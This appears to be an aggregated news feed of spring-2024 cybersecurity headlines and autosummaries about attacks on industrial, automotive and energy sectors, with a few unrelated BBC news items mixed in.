
  Why the automotive sector is a target for email-based cyber attacks

  industry
  2024-04-30 https://www.helpnetsecurity.com/2024/04/30/automotive-email-compromise-attacks-video/
  

  While every organization across every vertical is at risk of advanced email attacks, certain industries periodically become the go-to target for threat actors. In this Help Net Security video, Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new most popular target for business email compromise and vendor email compromise attacks. The automotive industry is currently being targeted by cybercriminals who are launching business email compromise (BEC) and vendor email … More →

  The post Why the automotive sector is a target for email-based cyber attacks appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  UK enacts IoT cybersecurity law

  industry ciber
  2024-04-29 https://www.helpnetsecurity.com/2024/04/29/uk-enacts-iot-cybersecurity-law/
  

  The Product Security and Telecommunications Infrastructure (PSTI) Act has come into effect today, requiring manufacturers of consumer-grade IoT products sold in the UK to stop using guessable default passwords and have a vulnerability disclosure policy. “Most smart devices are manufactured outside the UK, but the PSTI act also applies to all organisations importing or retailing products for the UK market. Failure to comply with the act is a criminal offence, with fines up to £10 … More →

  The post UK enacts IoT cybersecurity law appeared first on Help Net Security.

  "

  Autosummary: About the legislation The PSTI Act covers internet- and network-connectable products, including “smart”: TVs, streaming devices, speakers Games consoles, smartphones, tablets Base stations and hubs Home automation and alarm systems “Wearables”: smart watches, fitness trackers, etc. "

  ---

  Sweden’s liquor supply severely impacted by ransomware attack on logistics company

  exploits ransomware industry
  2024-04-26 https://securityaffairs.com/162333/cyber-crime/swedens-liquor-supply-ransomware-attack.html
  A ransomware attack on a Swedish logistics company Skanlog severely impacted the country’s liquor supply.  Skanlog, a critical distributor for Systembolaget, the Swedish government-owned retail chain suffered a ransomware attack. Systembolaget has a monopoly on the sale of alcoholic beverages containing more than 3.5% alcohol by volume. It operates stores across Sweden and is responsible […] "

  Autosummary: Sweden’s liquor supply severely impacted by ransomware attack on logistics company Pierluigi Paganini April 26, 2024 April 26, 2024 A ransomware attack on a Swedish logistics company Skanlog severely impacted the country’s liquor supply. "

  ---

  Tevez "satisfactory" in hospital after chest pains

  industry
  2024-04-24 https://www.bbc.com/sport/football/articles/c51n7ny9d1no
  Former West Ham, Manchester United and Manchester City striker Carlos Tevez is admitted to hospital after suffering chest pains. "

  Autosummary: "

  ---

  Microsoft pulls fix for Outlook bug behind ICS security alerts

  exploits industry
  2024-04-23 https://www.bleepingcomputer.com/news/microsoft/microsoft-pulls-fix-for-outlook-bug-unexpected-ICS-warnings-after-December-security-updates/
  Microsoft reversed the fix for an Outlook bug causing erroneous security warnings after installing December 2023 security updates [...] "

  Autosummary: "

  ---

  Fuxnet malware: Growing threat to industrial sensors

  exploits industry
  2024-04-22 https://www.helpnetsecurity.com/2024/04/22/fuxnet-malware-video/
  

  In this Help Net Security video, Sonu Shankar, Chief Strategy Officer at Phosphorus, discusses how Blackjack’s Fuxnet malware should be a wakeup call to industrial operators about the vulnerability of sensor networks and the outsized impact these attacks can have on critical operations.

  The post Fuxnet malware: Growing threat to industrial sensors appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Russian Hacker Group ToddyCat Uses Advanced Tools for Industrial-Scale Data Theft

  industry rusia-ucrania
  2024-04-22 https://thehackernews.com/2024/04/russian-hacker-group-toddycat-uses.html
  The threat actor known as ToddyCat has been observed using a wide range of tools to retain access to compromised environments and steal valuable data. Russian cybersecurity firm Kaspersky characterized the adversary as relying on various programs to harvest data on an "industrial scale" from primarily governmental organizations, some of them defense related, located in "

  Autosummary: "

  ---

  FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor

  industry
  2024-04-18 https://thehackernews.com/2024/04/fin7-cybercrime-group-targeting-us-auto.html
  The infamous cybercrime syndicate known as FIN7 has been linked to a spear-phishing campaign targeting the U.S. automotive industry to deliver a known backdoor called Carbanak (aka Anunak). "FIN7 identified employees at the company who worked in the IT department and had higher levels of administrative rights," the BlackBerry research and intelligence team said in a new write-up. "They "

  Autosummary: "

  ---

  GuidePoint Security introduces IoT Security Assessment

  industry
  2024-04-16 https://www.helpnetsecurity.com/2024/04/16/guidepoint-security-iot-security-assessment/
  

  GuidePoint Security announced its IoT Security Assessment, a new cybersecurity service. GuidePoint Security’s team of IoT security and embedded systems experts have extensive experience identifying potential weaknesses in IoT devices and applications across a wide range of industries. Organizations that leverage GuidePoint’s targeted IoT Security Assessment can ultimately identify and fix vulnerabilities, fortify their defenses, inspire confidence in their customers, and prevent unwanted access to their IoT ecosystem. “IoT devices are prevalent in many industries, … More →

  The post GuidePoint Security introduces IoT Security Assessment appeared first on Help Net Security.

  "

  Autosummary: “IoT devices are prevalent in many industries, yet the risks associated with them are often underestimated or overlooked, leaving many organizations and their IT systems vulnerable to potential threats,” said Victor Wieczorek, VP of Application Security and Threat & Attack Simulation, GuidePoint Security. "

  ---

  Ukrainian Blackjack group used ICS malware Fuxnet against Russian targets

  exploits industry rusia-ucrania
  2024-04-15 https://securityaffairs.com/161865/hacking/blackjack-ics-malware-fuxnet.html
  The Ukrainian hacking group Blackjack used a destructive ICS malware dubbed Fuxnet in attacks against Russian infrastructure. Industrial and enterprise IoT cybersecurity firm Claroty reported that the Ukrainian Blackjack hacking group claims to have damaged emergency detection and response capabilities in Moscow and beyond the Russian capital using a destructive ICS malware dubbed Fuxnet. The […] "

  Autosummary: “The attackers developed and deployed malware that targeted the gateways and deleted filesystems, directories, disabled remote access services, routing services for each device, and rewrote flash memory, destroyed NAND memory chips, UBI volumes and other actions that further disrupted operation of these gateways.” concludes the report.However, our analysis of data leaked by Blackjack, including the Fuxnet malware, indicates that only a little more than 500 sensor gateways were bricked by the malware in the attack, and the remote sensors and controllers likely remain intact.” reads the analysis published by Claroty. "

  ---

  Why women struggle in the cybersecurity industry

  industry ciber
  2024-04-12 https://www.helpnetsecurity.com/2024/04/12/women-cybersecurity-workplace-experiences/
  

  The workplace experiences of women in cybersecurity are dramatically worse than men across virtually every category, according to a WiCyS and Aleria survey. Previous studies have illustrated that the representation of women in cybersecurity is much lower than it should be, but can’t explain why or how we can improve matters. Women confront exclusion at higher rates Women encounter exclusion at twice the rate of men, signaling a pressing need for industry-wide cultural and procedural … More →

  The post Why women struggle in the cybersecurity industry appeared first on Help Net Security.

  "

  Autosummary: Top four categories of exclusion The top four categories of exclusion faced by women are respect, career and growth, access and participation and recognition, signaling critical intervention points. "

  ---

  Optics giant Hoya hit with $10 million ransomware demand

  exploits ransomware industry
  2024-04-11 https://www.bleepingcomputer.com/news/security/optics-giant-hoya-hit-with-10-million-ransomware-demand/
  A recent cyberattack on Hoya Corporation was conducted by the "Hunters International" ransomware operation, which demanded a $10 million ransom for a file decryptor and not to release files stolen during the attack. [...] "

  Autosummary: Hunters International is a Ransomware-as-a-Service (RaaS) operation that emerged in mid-2023, whose encryptor shares code with the Hive ransomware operation, indicating a possible rebrand. "

  ---

  Venezuela"s ex-oil minister reappears - in handcuffs

  industry
  2024-04-10 https://www.bbc.co.uk/news/world-latin-america-68779090
  Tareck El Aissami, a former close ally of President Maduro, has been arrested on corruption charges. "

  Autosummary: "

  ---

  How can the energy sector bolster its resilience to ransomware attacks?

  exploits ransomware industry
  2024-04-08 https://www.helpnetsecurity.com/2024/04/08/energy-sector-attacks-resilience/
  

  Since it plays a vital role in every functioning society, the energy sector has always been a prime target for state-backed cybercriminals. The cyber threats targeting this industry have grown significantly in recent years, as geopolitical tensions have fueled an increase in state-sponsored cyber espionage. According to one report on OT/ICS cyber security incidents, the energy sector recorded 39% of all attacks, with nearly 60% of these attacks attributed to state-affiliated groups. As well as … More →

  The post How can the energy sector bolster its resilience to ransomware attacks? appeared first on Help Net Security.

  "

  Autosummary: Moreover, energy providers still rely on ageing OT assets like industrial control systems (ICS), supervisory control and data acquisition (SCADA) systems, and programmable logic controllers (PLCs). The critical threat of ransomware In 2023, we saw an increase in ransomware attacks against the energy industry including nuclear, oil, and gas facilities. "

  ---

  Industrial sectors embrace zero trust for enhanced security

  industry
  2024-04-08 https://www.helpnetsecurity.com/2024/04/08/ot-environments-zero-trust-implementation/
  

  Organizations are leveraging zero trust to enhance the safety, security, and reliability of their enterprise across IT and OT environments, according to Xage Security. Zero trust security implementation in industrial sectors The report analyzes the current status and trajectory of zero trust security implementation within industrial organizations, specifically focusing on critical infrastructure and manufacturing sectors. The growing and evolving threat landscape has elevated cybersecurity to a top priority for infrastructure operators across the globe. New … More →

  The post Industrial sectors embrace zero trust for enhanced security appeared first on Help Net Security.

  "

  Autosummary: “While zero trust is not a one-size-fits-all model, the data shows that organizations are evolving their understanding of zero trust as a strategy to enhance the safety, security, and reliability of both their enterprise IT and OT environments,” said Jonathon Gordon, Industry Analyst at Takepoint Research. "

  ---

  Veriato introduces AI-driven predictive behavior analytics platform

  industry
  2024-04-08 https://www.helpnetsecurity.com/2024/04/08/veriato-irm/
  

  Veriato released their next generation Insider Risk Management (IRM) solution. With organizations of all sizes facing a more complex cybersecurity environment, Veriato IRM delivers flexibility and scalability using the power of GenAI. Veriato’s IRM solution offers technology for companies looking to improve their threat mitigation with AI enabled predictive analytics delivering better detection and predictability. According to IBM, the average cost of a single data breach has reached $4.45 million, a record high. Organizations need … More →

  The post Veriato introduces AI-driven predictive behavior analytics platform appeared first on Help Net Security.

  "

  Autosummary: “We are extremely excited to build upon our history as the category creator, and provide a new layer of control, transparency, confidence and perhaps most importantly, proactivity,” added Harz. "

  ---

  Boom times for US green energy as federal cash flows in

  industry
  2024-04-08 https://www.bbc.co.uk/news/business-68667140
  The US government has directed unprecedented sums of money at green energy projects. "

  Autosummary: "

  ---

  New Phishing Campaign Targets Oil & Gas with Evolved Data-Stealing Malware

  financial exploits industry
  2024-04-04 https://thehackernews.com/2024/04/new-phishing-campaign-targets-oil-gas.html
  An updated version of an information-stealing malware called Rhadamanthys is being used in phishing campaigns targeting the oil and gas sector. "The phishing emails use a unique vehicle incident lure and, in later stages of the infection chain, spoof the Federal Bureau of Transportation in a PDF that mentions a significant fine for the incident," Cofense researcher Dylan Duncan said. The "

  Autosummary: "The main actor [Bignosa] appears to be a part of a group operating malware and phishing campaigns, targeting organizations, which is testified by the US and Australian email business databases, as well as individuals," the Israeli cybersecurity company said. "

  ---

  Hoya’s optics production and orders disrupted by cyberattack

  industry ciber
  2024-04-04 https://www.bleepingcomputer.com/news/security/hoyas-optics-production-and-orders-disrupted-by-cyberattack/
  Hoya Corporation, one of the largest global manufacturers of optical products, says a "system failure" caused servers at some of its production plants and business divisions to go offline on Saturday. [...] "

  Autosummary: "

  ---

  Cyber attacks on critical infrastructure show advanced tactics and new capabilities

  industry
  2024-04-03 https://www.helpnetsecurity.com/2024/04/03/marty-edwards-tenable-critical-infrastructure-systems-cybersecurity/
  

  In this Help Net Security interview, Marty Edwards, Deputy CTO OT/IoT at Tenable, discusses the impact of geopolitical tensions on cyber attacks targeting critical infrastructure. Edwards highlights the need for collaborative efforts between policymakers, government agencies, and the private sector to strengthen cybersecurity across critical infrastructure sectors. He emphasizes investment in personnel, technology, and proactive measures. How have recent political unrest and geopolitical tensions influenced the frequency and nature of cyber attacks on critical infrastructure? … More →

  The post Cyber attacks on critical infrastructure show advanced tactics and new capabilities appeared first on Help Net Security.

  "

  Autosummary: And inadequate cyber hygiene practices, such as default passwords and lack of authentication security, pose significant risks to critical infrastructure, particularly in sectors like water facilities.In this Help Net Security interview, Marty Edwards, Deputy CTO OT/IoT at Tenable, discusses the impact of geopolitical tensions on cyber attacks targeting critical infrastructure. Edwards highlights the need for collaborative efforts between policymakers, government agencies, and the private sector to strengthen cybersecurity across critical infrastructure sectors. "

  ---

  Google fixes two Pixel zero-day flaws exploited by forensics firms

  exploits industry
  2024-04-03 https://www.bleepingcomputer.com/news/security/google-fixes-two-pixel-zero-day-flaws-exploited-by-forensics-firms/
  Google has fixed two Google Pixel zero-days exploited by forensic firms to unlock phones without a PIN and gain access to the data stored within them. [...] "

  Autosummary: "CVE-2024-29745 refers to a vulnerability in the fastboot firmware used to support unlocking/flashing/locking," explained GrapheneOS via a thread on X. "Forensic companies are rebooting devices in "After First Unlock" state into fastboot mode on Pixels and other devices to exploit vulnerabilities there and then dump memory. "

  ---

  Why AI forensics matters now

  industry
  2024-04-02 https://www.helpnetsecurity.com/2024/04/02/ai-forensics-video/
  

  In this Help Net Security video, Sylvia Acevedo, who serves on the Boards of Qualcomm and Credo, discusses why companies should invest in forensic capabilities and why forensics will be such an important topic as AI continues to be integrated into infrastructures and workflows. In an era where AI is becoming increasingly integral to business operations, the lack of comprehensive education and training in AI forensics poses a significant threat. This gap leaves organizations vulnerable … More →

  The post Why AI forensics matters now appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  APT and financial attacks on industrial organizations in H2 2023

  financial industry
  2024-04-02 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-h2-2023/
  An overview of reports of APT and financial attacks on industrial enterprises, as well as related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities "

  Autosummary: CISA alert on LockBit 3.0 ransomware On November 21, 2023, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) released a joint alert that disseminates Indicators of Compromise (IOCs), Tactics, Techniques and Procedures (TTPs), and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances. CISA alert on Star Blizzard In a joint advisory published on December 7, the “Five Eyes” security agencies (the Cybersecurity and Infrastructure Security Agency (CISA) in coordination with the United Kingdom’s National Cyber Security Centre (UK-NCSC), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), Canadian Centre for Cyber Security (CCCS), New Zealand National Cyber Security Centre (NCSC-NZ), and the U.S. National Security Agency (NSA), Federal Bureau of Investigation (FBI), and Cyber Command Cyber National Mission Force (CNMF)) warned about the evolving phishing techniques employed by Star Blizzard and its targeting of individuals and organizations, including the U.S. government and defense industrial base.The group uses both well-known classic credential access tools and custom applications: Bughatch, Burntcigar, Cobeacon, Hancitor (Chanitor), Termite, SystemBC, Veeamp, Wedgecut, RomCOM RAT, Mimikatz, PowerShell, PsExec, and Remote Desktop Protocol. Since March, Microsoft researchers have observed phishing attacks by TA422 (aka APT28, Forest Blizzard, Strontium, Fancy Bear, and Fighting Ursa) targeting government, energy, transportation, and non-governmental organizations in the U.S., Europe, and the Middle East.TEMP.Hex is targeting a variety of sectors, including construction and engineering, business services, government, health, transportation, and retail organizations in Europe, Asia, and the U.S. Another threat actor tracked as UNC4698 is also using USB drives to spread the SnowyDrive malware, which creates a backdoor on infected systems, providing attackers a way to remotely interact with the device and issue commands.This group, which typically targets logistics, government, and financial sectors in India and Israel (and, to a lesser extent, in Australia, Senegal, the Netherlands, Sweden, and Ethiopia), has been linked to more than 750 DDoS attacks and 78 website defacements since June 2022. CISA alert on Rhysida ransomware The U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint alert that provides defenders with Rhysida Ransomware indicators of compromise (IOCs), detection information, and tactics, techniques, and procedures (TTPs) discovered during investigations as of September 2023.The group used a new backdoor named Sponsor to target organizations in Brazil, Israel, and the UAE: the targeted entities include automotive, manufacturing, engineering, financial services, media, healthcare, technology, and telecoms sectors. In a joint advisory published on December 13, the FBI, the Cybersecurity & Infrastructure Security Agency (CISA), the NSA, the Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK National Cyber Security Centre (NCSC) warned that APT29 has been exploiting an authentication bypass vulnerability (CVE-2023-42793) in TeamCity.Cuba targeted organizations in the U.S., Canada, Australia, and Europe with a series of high-profile attacks on oil companies, manufacturing, financial services, government agencies, healthcare providers, and others.LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation.Over the past year, at least 16 organizations in Russia and one (a ministry) in Serbia have become victims, including state and educational institutions, enterprises of the aviation, rocket-space, and agricultural industries, the military‑industrial and fuel-energy complex, and infosec companies.Athena comes loaded with features, such as Crossplatform for Windows, Linux, and OSX, SOCKS5 Support, Reverse Port Forwarding, Reflective loading of Assemblies, Modular loading of commands, and much more. OilRig attacks ESET researchers analyzed a series of new OilRig (aka APT34, Lyceum, Crambus, or Siamesekitten) downloaders that the threat actor used in 2022 campaigns to target organizations in Israel, including a healthcare organization, a manufacturing company, and a local governmental body.The new downloaders named SampleCheck5000 (SC5k v1-v3), OilCheck, ODAgent, and OilBooster, are notable for using legitimate cloud storage and cloud‑based email services for C2 communications and data exfiltration as a way to hide malicious communication and mask the group’s network infrastructure: Microsoft OneDrive, Exchange Online and Office 365 through via Microsoft Graph and Outlook API, as well as Microsoft Office Exchange Web Services (EWS).Top organizations were in manufacturing, insurance, technology, and financial services that received 15%, 9%, 7%, and 6% of the emails, respectively. Imperial Kitten/Yellow Liderc/Tortoiseshell attacks According to PwC researchers, threat actor Yellow Liderc (aka Imperial Kitten, Tortoiseshell, TA456, and Crimson Sandstorm) has launched watering-hole attacks to distribute IMAPLoader malware, which exploits Windows utilities to identify target systems and deploy additional payloads.Observed as a Ransomware-as-a-Service (RaaS) model, Rhysida actors have compromised organizations in education, manufacturing, information technology, and government sectors since May 2023, and any ransom paid is split between the group and affiliates.According to Proofpoint researchers, TA422 used the vulnerabilities as initial access against government, aerospace, education, finance, manufacturing, and technology sector targets likely to either disclose user credentials or initiate follow-on activity. At least 20 Russian organizations have been affected, most of which are in the public sector, information technology, space industry and energy sector, but also including construction, transportation, and logistics companies.The majority of affected entities are directly involved in defense manufacturing, encompassing radar systems, unmanned aerial vehicles (UAVs), military vehicles, vessels, weaponry, and companies related to the navy. APT29/Midnight Blizzard/Nobelium attacks Microsoft researchers report that Midnight Blizzard (aka Nobelium) has been using Microsoft Teams chats to target individuals in government, NGOs, IT services, technology, discrete manufacturing, and media sectors.The group’s activity began in February 2023 and continued until at least May 2023, stealing sensitive information from manufacturing, IT, and biomedical companies in Taiwan, as well as victims in the U.S., Vietnam, and Pacific Islands.Among those compromised were large companies in the field of communications, information security and IT, technology centers, universities and research institutes engaged in advanced developments and technologies, pharmaceutical companies, defense enterprises, and financial organizations. CISA alert on CyberAv3ngers attacks The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), NSA, EPA, and Israel’s National Cyber Directorate published a joint Cybersecurity Advisory (CSA) on December 14 on the threat actor calling itself CyberAv3ngers responsible for the attack on the Municipal Water Authority of Aliquippa in Pennsylvania. Ballistic Bobcat/Charming Kitten attacks ESET researchers uncovered a sophisticated cyber-espionage campaign carried out by suspected Iranian-aligned threat actor Ballistic Bobcat (aka APT35, APT42, Charming Kitten, TA453, and PHOSPHORUS). "

  ---

  Escalating malware tactics drive global cybercrime epidemic

  exploits industry
  2024-04-01 https://www.helpnetsecurity.com/2024/04/01/q4-2023-malware-rise/
  

  Evasive, basic, and encrypted malware all increased in Q4 2023, fueling a rise in total malware, according to WatchGuard. Threat actors employ diverse tactics The average malware detections rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific. “The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities … More →

  The post Escalating malware tactics drive global cybercrime epidemic appeared first on Help Net Security.

  "

  Autosummary: A malware-as-a-service (MaaS), Glupteba’s malicious capabilities include downloading additional malware, masquerading as a botnet, stealing sensitive information, and mining cryptocurrency with tremendous stealth. "

  ---

  Facebook spied on Snapchat users to get analytics about the competition

  industry
  2024-03-28 https://www.malwarebytes.com/blog/news/2024/03/facebook-spied-on-snapchat-users-to-get-analytics-about-the-competition
  Facebook is accused of using potentially criminal methods to spy on Snapchat users to gain a commercial advantage over its competition. "

  Autosummary: “Whenever someone asks a question about Snapchat, the answer is usually that because their traffic is encrypted we have no analytics about them. . . . "

  ---

  Ransomware as a Service and the Strange Economics of the Dark Web

  exploits industry
  2024-03-27 https://www.bleepingcomputer.com/news/security/ransomware-as-a-service-and-the-strange-economics-of-the-dark-web/
  Ransomware is quickly changing in 2024, with massive disruptions and large gangs shutting down. Learn from Flare how affiliate competition is changing in 2024, and what might come next. [...] "

  Autosummary: Ransomware Groups and Affiliates: A Complex Supply Chain As the cybercrime ecosystem has grown, it’s also grown more complex with many different actors carrying out individual legs of a complex supply chain. This has led to a highly competitive ecosystem, in which the largest ransomware groups try to offer potential affiliates a larger share of successful ransoms and less restrictions than other groups as a play to win the most sophisticated affiliates. LockBit’s Affiliate Rules page Giving affiliates the hard work of executing successful attacks allows the groups to scale much faster and compromise many more victims than would otherwise be possible while also enabling the groups to continue to innovate on their ransomware code. "

  ---

  Hackers Hit Indian Defense, Energy Sectors with Malware Posing as Air Force Invite

  exploits industry
  2024-03-27 https://thehackernews.com/2024/03/hackers-target-indian-defense-and.html
  Indian government entities and energy companies have been targeted by unknown threat actors with an aim to deliver a modified version of an open-source information stealer malware called HackBrowserData and exfiltrate sensitive information in some cases by using Slack as command-and-control (C2). "The information stealer was delivered via a phishing email, masquerading as an invitation letter "

  Autosummary: The attack chain starts with a phishing message containing an ISO file ("invite.iso"), which, in turn, contains a Windows shortcut (LNK) that triggers the execution of a hidden binary ("scholar.exe") present within the mounted optical disk image. "

  ---

  Tech industry’s focus on innovation leaves security behind

  industry
  2024-03-26 https://www.helpnetsecurity.com/2024/03/26/technology-companies-cyber-threats/
  

  The rapid digital transformation and technological progress within the technology sector have enlarged the attack surface for companies operating in this space, according to Trustwave. As the sector evolves, the proliferation of Software-as-a-Service (SaaS) providers, cloud infrastructure, and internet-connected systems and devices continue to grow. This growth often occurs at a rate that outstrips the deployment of adequate security measures, such as the inability to keep track of and remediate vulnerabilities, which exposes the company … More →

  The post Tech industry’s focus on innovation leaves security behind appeared first on Help Net Security.

  "

  Autosummary: As the sector evolves, the proliferation of Software-as-a-Service (SaaS) providers, cloud infrastructure, and internet-connected systems and devices continue to grow.Even a minor security breach can cripple a company and cause cascading disruptions across the vital systems we rely on, including internal business operations, customer-trusted software and products, and the infrastructure supporting supply chains. "

  ---

  Watch ‘devils’ whip Catholics in Easter tradition

  industry
  2024-03-26 https://www.bbc.co.uk/news/world-latin-america-68662739
  Men dressed as devils - "talciguines" - whip the faithful in a playful Easter tradition in El Salvador. "

  Autosummary: "

  ---

  Malicious NuGet Package Linked to Industrial Espionage Targets Developers

  industry
  2024-03-26 https://thehackernews.com/2024/03/malicious-nuget-package-linked-to.html
  Threat hunters have identified a suspicious package in the NuGet package manager that"s likely designed to target developers working with tools made by a Chinese firm that specializes in industrial- and digital equipment manufacturing. The package in question is SqzrFramework480, which ReversingLabs said was first published on January 24, 2024. It has been downloaded  "

  Autosummary: " Present within the library is a DLL file "SqzrFramework480.dll" that comes with features to take screenshots, ping a remote IP address after every 30 seconds until the operation is successful, and transmit the screenshots over a socket created and connected to said IP address. "

  ---

  CISA: Here’s how you can foil DDoS attacks

  industry
  2024-03-22 https://www.helpnetsecurity.com/2024/03/22/guidance-ddos-attacks/
  

  In light of the rise of “DDoS hacktivism” and the recent DDoS attacks aimed at disrupting French and Alabama government websites, the Cybersecurity and Infrastructure Security Agency (CISA) has updated its guidance of how governmental entities (but also other organizations) should respond to this type of attacks. DDoS attacks explained First and foremost, the document explains the main difference between a DoS attack (from a single source) and a DDoS attack (from multiple sources). “The … More →

  The post CISA: Here’s how you can foil DDoS attacks appeared first on Help Net Security.

  "

  Autosummary: "

  ---

  Fears of hunger as Haiti turmoil spreads

  industry
  2024-03-21 https://www.bbc.co.uk/news/world-latin-america-68622814
  Millions are caught in a perfect storm of politics, violence and homelessness, reports the BBC"s Will Grant. "

  Autosummary: "

  ---

  Regulatory measures boost cybersecurity industry

  industry ciber
  2024-03-20 https://www.helpnetsecurity.com/2024/03/20/regulatory-measures-cybersecurity-industry/
  

  According to the UAE Cybersecurity Council, in 2023, the UAE repelled over 50,000 cyberattacks daily. These findings, highlighted in a report from Frost & Sullivan (F&S), show the exponential growth of the region’s cybersecurity landscape – and serve as a sobering reminder of the rising threats that accompany it. As the GCC (Gulf Cooperation Council) cybersecurity industry continues to grow—F&S estimates it will triple in value by 2030 to reach $13.4 billion—countries in the region … More →

  The post Regulatory measures boost cybersecurity industry appeared first on Help Net Security.

  "

  Autosummary: Building a cyber resilient posture Saudi Arabia, the UAE, and Bahrain have also established the National Cybersecurity Authority, the National Electronic Security Authority, and the National Cybersecurity Centre, respectively, to oversee ongoing industry efforts. "

  ---

  Threat landscape for industrial automation systems. Statistics for H2 2023

  industry
  2024-03-19 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h2-2023/
  The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

  Autosummary: 2023 in numbers Parameter H1 2023 H2 2023 2023 Global percentage of attacked ICS computers 34.0% 31.9% 38.6% Main threat sources Internet 19.3% 18.1% 22.8% Email clients 6.0% 4.0% 5.4% Removable media 3.4% 1.9% 3.2% Network folders 0.49% 0.25% 0.45% Percentage of ICS computers on which malicious objects from different categories were blocked Malicious scripts and phishing pages (JS and HTML) 12.7% 10.9% 14.7% Denylisted internet resources 11.3% 10.1% 13.7% Spy Trojans, backdoors and keyloggers 6.1% 5.3% 7.1% Malicious documents (Microsoft Office and PDF) 4.0% 2.9% 4.0% Worms 2.3% 2.1% 3.0% Viruses 2.4% 2.1% 2.8% Web miners running in browsers 1.3% 0.76% 1.3% Miners in the form of executable files for Windows 0.59% 0.85% 1.1% Ransomware 0.32% 0.25% 0.37% 2023 Back to the minimum Following the increase of 2021 and 2022, the percentage of ICS computers on which malicious objects were blocked dropped by 2 pp and returned to the same level as in 2020. Regions Africa Africa leads the rankings for Percentage of ICS computers on which spyware was blocked was blocked Percentage of ICS computers on which worms were blocked were blocked Percentage of ICS computers on which web miners were blocked were blocked Percentage of ICS computers on which removable media threats were blocked.This group includes Windows computers that serve one or several of the following purposes: Supervisory control and data acquisition (SCADA) servers Data storage (Historian) servers Data gateways (OPC) Stationary workstations of engineers and operators Mobile workstations of engineers and operators Human machine interface (HMI) OT network administration computers ICS software development computers We consider a computer as attacked if a Kaspersky security solution blocked one or more threats on that computer during the period in review: a month, six months, or a year depending on the context as can be seen in the charts above. Percentage of ICS computers on which malicious objects from various sources were blocked, 2020–2023 Red lines of 2023 By the end of 2023, the percentage of ICS computers on which malicious objects were blocked increased in two regions: Eastern Europe, by 4.4 pp Western Europe, by 3.5 pp Regions and world. Percentage of ICS computers on which malicious objects from various sources were blocked Percentage of ICS computers on which threats from network folders were blocked As in the case of the statistics across all threats, the percentage of ICS computers where malicious objects from various sources were blocked varied with region.Percentage of ICS computers on which malicious objects were blocked, January–December 2022 and 2023 In Eastern Europe, H1 2023 saw the lowest figures since 2020, and H2, the highest percentage of attacked ICS computers in 2020-2023 (30.9%). Fifteen countries and territories with the highest percentage of ICS computers on which spyware was blocked, H2 2023 Ransomware In the second half of 2023, the percentage of ICS computers on which ransomware was blocked dropped to the four-year minimum of 0.25%. Regions ranked by percentage of ICS computers on which malicious scripts and phishing pages were blocked, H2 2023 The percentage of ICS computers on which malicious objects in this category were blocked increased in six regions within the six-month period, most of all in Eastern Europe (by 2.9 pp). Regions ranked by percentage of ICS computers on which malicious email attachments and phishing links were blocked, H2 2023 Removable media As before, Africa led the regional ranking by percentage of ICS computers on which removable media threats were blocked. Regions ranked by percentage of ICS computers on which denylisted internet resources were blocked, H2 2023 Tajikistan and Yemen led the country ranking by percentage of ICS computers on which denylisted internet resources were blocked, with 18.2% and 16.6%, respectively. Regions ranked by percentage of ICS computers on which malicious documents were blocked, H2 2023 Greece and Mexico led the country and territory ranking by percentage of ICS computers on which malicious documents were blocked with 9.4% and 8.5%, respectively. Ten countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked in H2 2023 Selected industries In H2 2023, building automation once again had the highest percentage of ICS computers on which malicious objects were blocked of all industries that we studied. Percentage of ICS computers on which malicious objects were blocked, by month, 2021-2023 In terms of month-to-month fluctuations, the year 2023 differs from the two that preceded it, while being closer to 2021 than to 2022. Regions ranked by percentage of ICS computers on which browser-based web miners were blocked, H2 2023 Yemen (3.9%) and Serbia (3.5%) topped the ranking of countries and territories by percentage of ICS computers on which web miners were blocked.Percentage of ICS computers on which malicious objects were blocked, by half year, 2020–2023 The percentage of attacked ICS computers in Western Europe each month in 2023, with the exception of January, represented a year-on-year increase. "

  ---

  New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics

  exploits industry
  2024-03-18 https://thehackernews.com/2024/03/new-deepgosu-malware-campaign-targets.html
  A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information. Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it"s likely associated with the North Korean state-sponsored group tracked as Kimsuky. "The malware payloads used in the DEEP#GOSU represent a "

  Autosummary: The second-stage PowerShell script, for its part, fetches a new file from Dropbox ("r_enc.bin"), a .NET assembly file in binary form that"s actually an open-source remote access trojan known as TruRat (aka TutRat or C# RAT) with capabilities to record keystrokes, manage files, and facilitate remote control. Also retrieved by the PowerShell script from Dropbox is a VBScript ("info_sc.txt"), which, in turn, is designed to run arbitrary VBScript code retrieved from the cloud storage service, including a PowerShell script ("w568232.ps12x"). "

  ---

  Ande Loader Malware Targets Manufacturing Sector in North America

  exploits industry
  2024-03-14 https://thehackernews.com/2024/03/ande-loader-malware-targets.html
